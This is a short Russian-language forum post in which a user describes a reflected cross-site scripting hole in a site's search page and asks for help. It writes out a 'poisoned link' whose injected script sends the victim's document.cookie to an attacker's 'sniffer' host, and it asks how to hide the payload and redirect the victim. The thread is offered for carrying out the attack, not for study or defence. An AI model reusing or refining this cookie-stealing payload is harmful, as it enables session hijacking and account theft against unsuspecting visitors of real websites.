dddoomsday
Чтобы обрабатывался скрипт, нужно код заключить в функциональный тэг script или атрибуты - обработчики событий. если ты просто запилишь картинку сниффера, куки не украдешь.
Столкулся с такой проблемой, почему то редирект не работает, на одном сайте нашел пассивку, уязвимость существует на поисковике сайта.
Ядовитая ссылка: http://уязвимый.сайт.ру/search/all?q="> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie;
cookies приходит нормально), но ппц палится, просто на просто этот код "> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie; остается на поисковике уязвимого сайта и не направляет на другой сайт. В чем может быть проблема?
если использовать location.href ="http://адрес_редиректа/" то куки вообще не приходит.